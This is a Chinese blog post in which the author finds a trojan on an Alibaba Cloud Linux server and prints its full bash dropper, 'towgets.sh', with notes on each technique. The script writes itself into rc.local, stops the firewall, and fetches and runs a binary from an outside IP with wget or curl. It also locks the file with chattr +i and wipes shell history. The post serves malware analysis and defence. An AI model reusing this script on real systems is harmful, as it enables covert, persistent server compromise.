帮一个朋友在阿里云Linux服务器上装软件,发现出奇的卡,终端上敲几个字就卡几十秒。ps -ef一看,发现两个可疑物:
/etc/tows
/etc/towgets.sh乘着不卡,cat /etc/tows,擦,很明显的木马。哎,做点什么不好,黑人有啥好玩的!
Anyway,把脚本拿出来给大家学习下。涉及到如下几个技术点:
- echo “sh /etc/towgets.sh &” >> /etc/rc.local: 开机自启动
- history -c : 清理脚本命令history,尽量防止被人发现
- chattr +i /etc/tows : root也删不了哦,需要先chattr -i之后才能rm
- /etc/init.d/iptables stop : 防止防火墙阻止自己下代码(木马实体)
- ps aux | grep “tows” | grep -v grep | awk ‘{print $2}’ 找tows有多少个,kill 防止启动多个实例
#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
# by:Tyrant
# 2015-02-12
if [ "sh /etc/towgets.sh &" = "$(cat /etc/rc.local | grep /etc/towgets.sh | grep -v grep)" ]; then
echo ""
else
echo "sh /etc/towgets.sh &" >> /etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
echo "nohup /etc/tows > /dev/null 2>&1 &">>/etc/rc.local
fi
while [ 1 ]; do
Centos_sshd_killn=$(ps aux | grep "/etc/tows" | grep -v grep | wc -l)
if [[ $Centos_sshd_killn -eq 0 ]]; then
if [ ! -f "/etc/tows" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
#./wget -P . http://222.186.58.233:58961/tows
./wget -P /etc/ http://222.186.58.233:58961/tows &> /dev/null
else
curl -o /etc/tows http://222.186.58.233:58961/tows
fi
fi
/etc/init.d/iptables stop
chmod +x /etc/tows
rm wget -rf
/etc/tows &
#./etc/tows &
chattr +i /etc/tows
history -c
elif [[ $Centos_sshd_killn -gt 1 ]]; then
for killed in $(ps aux | grep "tows" | grep -v grep | awk '{print $2}'); do
Centos_sshd_killn=$(($Centos_sshd_killn-1))
if [[ $Centos_sshd_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
sleep 600
done
脚本本身没啥。至于卡顿,应该是tows写得比较挫,没处理好资源利用导致。
3510
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
